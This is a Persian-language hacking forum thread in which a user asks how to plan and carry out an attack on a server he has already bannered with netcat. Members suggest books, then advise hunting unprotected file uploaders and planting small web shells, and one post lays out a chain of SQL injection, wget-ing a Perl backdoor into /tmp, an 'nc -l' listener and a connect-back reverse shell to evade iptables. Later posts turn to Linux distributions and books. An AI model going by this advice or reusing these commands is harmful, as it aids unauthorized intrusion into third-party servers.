اطلاعیه

Collapse
No announcement yet.

طراحي و عملی کردن حمله

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • طراحي Ùˆ عملی کردن حمله

    شما چه راهی رو به من پیشنهاد می کنید ؟
    1- استفاده از اسکنر ها برای یافتن آسیب پذیری؟
    2- تست بصورت دستی آسیب پذیری های مرتبت با نرم افزاری که در هدرز نشان داده شده ؟
    من nc زدم و هدر گرفتم و الان یک سری اطلاعات راجب سرور دارم .

    یکم راجب مراحل طراحی حمله و عملی کردن حمله توضیح بدید .
    برای شروع کار از یک پورت اسکنر کمک گرفتم ولی برای پیدا کردن حفره های امنیتی نمی دونم چی کار کنم .
    شما چه اسکنری رو پیشنهاد می کنید؟

  • #2
    برو کلاس زبان بعد 5 تا کتاب ار سری Hacking Exposed O یک نگاه بکن
    لا اقل تئوری را کمی درک می کنی

    Comment


    • #3
      دوسته عزیز با اصول هک و امنیت و برنامه نویسی آشنایی داری؟!
      اگه داری
      هدفتو یه بار از سرور چک کن
      یه بار از خودش
      منظورم اینه بینن مثلا سایت
      با فلان برنامه درست شده مشکل داره...
      یا کلا برو طرف سرور هکینگ

      Comment


      • #4
        مرسی که راهنمایی کردید .
        بهتره برم همون اصولی یاد بگیرم . چون اینطوری فایده ای نداره .
        Hacking Expossed تو انقلاب گیر می یاد؟
        می شه یک جا معرفی کنید و آدرس بدید ؟ چون counter Hack هم می خوام بگیرم .

        Comment


        • #5
          اره گیر میآد غیر از جلد سیسکو اش که تازه دادن بیرون

          Comment


          • #6
            نوشته اصلی توسط mithridat3s
            مرسی که راهنمایی کردید .
            بهتره برم همون اصولی یاد بگیرم . چون اینطوری فایده ای نداره .
            Hacking Expossed تو انقلاب گیر می یاد؟
            می شه یک جا معرفی کنید و آدرس بدید ؟ چون counter Hack هم می خوام بگیرم .
            از طرف آدمین میگم:کتاب TCP/Ip یادت نره

            Comment


            • #7
              یادش به خیر زمان پرشین هکرز یه مقداری فعال بودی !!!
              خوب اول از همه یه چیزی بگم ! وقتی میبینی سرور طرف لینوکسه یه جورایی اکسپلویت رو بیخیال شو !
              سعی کن یا لوکال کار کنی روش یا injection حالا اگر شانس بیاری و هرجوری شده بتونی یه فایل توی سرور بسازی دیگه حله
              معمولا توی سرور ها اپلودر های Protect نشده زیاد پیدا میشه ! بگرد دنبال اونها
              سعی کن از شل های کم حجم استفاده کنی و.......

              اینجوری میشه شانسی شانسی یه Dedicated زد
              Emperor Hacking Team

              سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
              عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

              آدرس توئیتر من:https://twitter.com/#!/iM4n_

              به صفحه شبگرد در فیسبوک بپیوندید
              http://www.facebook.com/groups/shabgard

              تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

              sigpic

              Comment


              • #8
                ایمان خیلی می خوامت.
                تو همیشه یک راهنمای خوب برای من بودی:rolleyes:
                ولی فکر کنم اینطوری نمی شه باید از پایه شروع کنم . بازم ممنون یک چیزایی دست گیرم شد .

                Comment


                • #9
                  چه عجب یک آدم منطقی پیدا شد ...
                  اینو نبینی ضرر می کنی ...

                  Comment


                  • #10
                    LittleHacker همه همینو بهم می گن + تعریفات زیاد دیگه :D
                    ایمان و بقیه به این سخنان گوهر بار گوش بدید ببینید درست فهمیدم یا نه .

                    مثلا LocalRoot :

                    1)خوب SQL تزریق می کنیم که با تزریق کردنش سرور به ما اجازه ی آپلود کردن فایل رو می ده.

                    2)بعدش یک بک دور کم حجم توی سرور می سازیم .

                    CMD=cd /tmp;wget Adresse BackDoor rooye Net

                    3)کاری که ما می کنیم اینه که Netcat رو به صورت گوش به زنگ روی پورت X می زاریم .

                    nc -vv -l -p X

                    4)حالا به BackDoor دستور می دیم که به IP خودمون روی پورت X وصل بشه .

                    cmd=cd /tmp;perl dc.pl Ip Pc khodemoon porte X

                    5)حالا BackDoor به NetCat وصل شده . فکر کنم الان شل گرفته باشیم و روی البته اگه مشکل خاصی پیش نیاد.
                    * فکر کنم با اینکار فایروال رو دور می زنه * درسته ؟
                    اگر راه های متفاوت دیگه ای هم هست بگید که برم دنبالش.
                    ---------------------------------------------------------------------------------------------
                    فقط اگر ممکنه راجب پیدا کردن SQL Injection توی سرور توضیح بدید .
                    واضح تر بگم از اسکنر برای پیدا کردنش کمک بگیرم؟ یا راه دیگه ای هست که بفهمیم این سرور این آسیب پذیری رو داره که می شه با SQL Injection شل بگیریم یا کارای دیگه ای بکنیم.؟؟
                    ---------------------------------------------------------------------------------------------
                    در حد تئوری یاد گرفتم که البته اشکالات در کار معلوم می شه.
                    بازم ایمان دستت درد نکنه لااقل توی جوابت 2 تا کلمه پیدا شد که باهاش بتونم سرچ کنم یک چیزی در بیارم که بدردم بخوره . از بقیه که چیزی در نمی یاد.;)
                    ---------------------------------------------------------------------------------------------
                    اگر قسمتی ناقصه و یا کاملا ناقصه . زحمت بکشید بنویسید.

                    Comment


                    • #11
                      اونجایی که تونستی یه شل بریزی رو سرور یعنی 60% کار رو انجام دادی
                      برای لوکال روت ها همش همین نیست
                      بعدش هم بهتره از NC استفاده نکنی
                      خیلی وقت ها یه phpshell ساده ترو به root میرسونه !
                      کلی بکدور توپ هست که اکثرا با Perl نوشته شدن ! کافیه یکی از اونا رو Wget کنی حالا خیلی وقت ها بازم بکدور ران میشه پورت هم بهت میده ولی نمیتونی بهش وصل بشی !
                      چون فایروال لینوکس یا همون iptables داره
                      برای همین میری سراغ Connect Back ها که بازم اکثرا با Perl نوشته شدن
                      یکی از پایه ای ترین کارها یاد گرفتن کامند های لینوکسه که خیلی به دردت میخوره !
                      Emperor Hacking Team

                      سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
                      عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

                      آدرس توئیتر من:https://twitter.com/#!/iM4n_

                      به صفحه شبگرد در فیسبوک بپیوندید
                      http://www.facebook.com/groups/shabgard

                      تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

                      sigpic

                      Comment


                      • #12
                        ok
                        ممنون ایمان یک کتاب لینوکس هم فکر کنم باید بگیرم. :confused: یکی در راه علم و دانش پول قرض بده .
                        راستی راجب PHPshell اطلاعات می گیرم دوباره میام .
                        ایمان ازین کلمات کلیدی بیشتر استفاده کن:D

                        Comment


                        • #13
                          این تایپیک ها چرا قسمتی برای ویرایش نداره ؟ چون من زیاد سوتی می دم ویرایش زیادی هم لازم دارم .
                          دوستان این لینوکس
                          یکم راجبش اطلاعات می دید ؟ شنیدم Linux Fedora 4 اومده من RedHat 8 رو قبلا نصب کرده بودم و باهاش کار می کردم .
                          درحال حاضر آخرین ورژنی که ادامه ی کار رد هت هست چیه ؟ و چندتا سی دی ؟
                          چندتا از بهترین کتاباش هم بگید که بگیرم .

                          Comment


                          • #14
                            در مورد ویرایش راست میگی واقعا نیازه در مورد لینوکس هر کی از راه میرسه یه ورژن میده بیرون
                            فکر کنم ردهت ورزن 14 هم اومده باشه :D :rolleyes:
                            ولی ردهت خوبه بعدش دبیان خوراکه

                            Comment


                            • #15
                              سلام
                              در مورد لینوکس بهتره با همون فدورا کار ******** تا راه بیوفتی بعد میتونی از توزیع های دیگه استفاده کنی (مثل اسلاکوار ودبیان ) .برای شروع یادگیری هم میتونی از مقالات سایت تکنوتاکس استفاده کنی.در مورد کتاب هم اگر فارسی مورد نظرته که دو تا کتاب های الن باغومیان به نظرم بهترینه .(یکی در مورد نصب راه اندازی سرورهای مبتنی بر دبیانه و اون یکی در مورد ردهت)

                              Comment

                              Working...
                              X